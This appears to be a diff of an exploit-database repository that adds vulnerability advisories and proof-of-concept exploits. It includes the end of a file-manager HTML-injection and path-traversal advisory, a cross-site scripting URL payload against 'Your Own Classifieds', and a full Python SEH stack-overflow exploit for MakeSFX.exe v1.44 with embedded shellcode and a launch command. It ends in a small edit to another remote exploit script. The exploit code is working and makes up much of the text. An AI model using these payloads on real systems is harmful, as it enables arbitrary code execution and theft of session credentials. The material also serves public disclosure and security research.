+<a href="1234.png.txt.iso.php.asp">1234.png.txt.iso.php.asp</a>    (    95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
+<a href="[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]">[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]</a>
+(    27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
+<a href="About/">About/</a>    (     0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
+</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
+<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
+</label></form></div></center></body></html></iframe></a></p></div></div>
+
+HTML-injection :
+
+<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
+<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
+<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
+<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
+<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
+<a href="[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp">[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp</a>
+(    95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
+<a href="[PERSISTENT INJECTED SCRIPT CODE!]">[PERSISTENT INJECTED SCRIPT CODE!]</a>
+(    27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
+<a href="About/">About/</a>    (     0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
+</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
+<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
+</label></form></div></center></body></html></iframe></a></p></div></div>
+
+

platforms/php/webapps/38367.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58399/info
+
+Your Own Classifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E 

platforms/windows/local/38362.py

@@ -0,0 +1,138 @@
+'''
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt
+
+
+
+Vendor:
+================================
+freeextractor.sourceforge.net/FreeExtractor
+freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe
+
+
+Vulnerable Product:
+==================================================
+MakeSFX.exe v1.44
+Mar 19 2001 & Dec 10 2009 versions
+
+
+
+Vulnerability Type:
+============================
+Stack Based Buffer Overflow
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=========================
+Converts a zip file into a 32-bit GUI Windows self-extractor.
+
+Example usage:
+
+makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
+[/website="http://www.example.com"] [/intro="This is a test self extractor"]
+[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow]
+[/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe]
+[/delete] [/icon="MyIcon.ico"] [/overwrite] [/?]
+
+etc...
+
+The '/title' argument when supplied an overly long payload will overwrite
+NSEH & SEH exception handlers
+causing buffer overflow, we can then execute our aribitrary shellcode. I
+have seen some applications using
+MakeSFX.exe from .bat files for some automation purposes, if the local .bat
+file is replaced by malicious
+one attackers can cause mayhem on the system.
+
+Both versions from 2001 & 2009 are vulnerable but exploit setup will be off
+by 20 bytes.
+punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
+v1.44 (Dec 10 2009)
+punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
+v1.44 (Mar 19 2001)
+
+
+POC exploit code(s):
+====================
+
+We will exploit MakeSFX v1.44 (Mar 19 2001).
+
+I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH,
+Rebase all set to False, but it contains null 0x00.
+So no suitable SEH instruction address avail, I will instead have to use
+mona.py to look for POP,POP,RET instruction
+in outside modules and we find some...
+
+e.g.
+
+0x77319529 : pop esi # pop edi # ret  |  {PAGE_READONLY}
+
+
+Python script to exploitz!
+==========================
+'''
+
+import struct,os,subprocess
+
+#MakeSFX v1.44 (Mar 19 2001)
+pgm="C:\\hyp3rlinx\\MakeSFX.exe "
+
+#shellcode to pop calc.exe
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+#punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM!
+
+nseh="\xEB\x06"+"\x90"*2
+seh=struct.pack('<L', 0x76F29529)
+
+punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
+subprocess.Popen([pgm, punksnotdead], shell=False)
+
+
+'''
+Disclosure Timeline:
+=========================================================
+Vendor Notification:  NA
+Sept 30, 2015  : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Local
+Tested successfully on Windows SP1
+DisableExceptionChainValidation in registry set to '1'
+value of 1 disables the registry entry that prevents SEH overwrites.
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author. The author is not responsible for any misuse of the information
+contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
+'''

platforms/windows/remote/31694.py

@@ -1,4 +1,5 @@
 #!/usr/bin/python
+# Tested on 6.1.19.0
 
 import sys,socket